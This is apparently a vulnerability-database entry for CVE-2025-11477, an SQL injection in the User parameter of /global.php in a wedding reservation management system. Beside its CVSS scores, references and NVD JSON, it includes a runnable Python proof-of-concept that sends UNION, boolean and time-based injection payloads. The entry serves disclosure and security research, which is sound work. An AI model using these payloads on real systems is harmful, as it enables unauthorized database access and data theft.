CVE-2025-11477

Description

A security flaw has been discovered in SourceCodester Wedding Reservation Management System 1.0. This vulnerability affects unknown code of the file /global.php. The manipulation of the argument User results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:janobe:wedding_reservation_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

SourceCodester Wedding Reservation Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-11477 - SourceCodester Wedding Reservation Management System 1.0
# SQL Injection PoC via User parameter in /global.php
# Author: Security Researcher

import requests

# Target configuration
TARGET_URL = "http://target-site.com/global.php"

# SQL Injection payload targeting the User parameter
# This payload attempts to extract database information via UNION-based injection
payload = {
    "User": "' UNION SELECT 1,2,3,4,5,6,7,8,9,10-- -"
}

# Alternative boolean-based blind injection payload
blind_payload = {
    "User": "' OR 1=1-- -"
}

# Time-based blind injection payload
time_based_payload = {
    "User": "' OR SLEEP(5)-- -"
}

def exploit_sql_injection(url, data):
    """
    Send the SQL injection payload to the target server
    """
    try:
        response = requests.post(url, data=data, timeout=10)
        if response.status_code == 200:
            print(f"[+] Request successful")
            print(f"[+] Response length: {len(response.text)}")
            print(f"[+] Response preview: {response.text[:500]}")
            return response.text
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            return None
    except Exception as e:
        print(f"[-] Error: {e}")
        return None

# Execute the exploit
if __name__ == "__main__":
    print("[*] CVE-2025-11477 SQL Injection PoC")
    print(f"[*] Target: {TARGET_URL}")
    print("[*] Attempting UNION-based injection...")
    result = exploit_sql_injection(TARGET_URL, payload)
    
    if result:
        print("[*] Attempting boolean-based blind injection...")
        exploit_sql_injection(TARGET_URL, blind_payload)
        
        print("[*] Attempting time-based blind injection...")
        exploit_sql_injection(TARGET_URL, time_based_payload)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-11477
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-11477
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-11477/
[4] VulDB https://vuldb.com/cve/CVE-2025-11477
[5] https://github.com/DrNbnonono/CVE/issues/4
[6] https://vuldb.com/?ctiid.327595
[7] https://vuldb.com/?id.327595
[8] https://vuldb.com/?submit.667119
[9] https://www.sourcecodester.com/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-11477", "sourceIdentifier": "[email protected]", "published": "2025-10-08T14:15:40.900", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in SourceCodester Wedding Reservation Management System 1.0. This vulnerability affects unknown code of the file /global.php. The manipulation of the argument User results in sql injection. The attack may be launched remotely. The exploit has been released to the public and may be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:janobe:wedding_reservation_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "663EAE48-5B0F-4D7E-BCB6-8B7861FD9AF5"}]}]}], "references": [{"url": "https://github.com/DrNbnonono/CVE/issues/4", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking", "Third Party Advisory"]}, {"url": "https://vuldb.com/?ctiid.327595", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.327595", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.667119", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://www.sourcecodester.com/", "source": "[email protected]", "tags": ["Product"]}]}}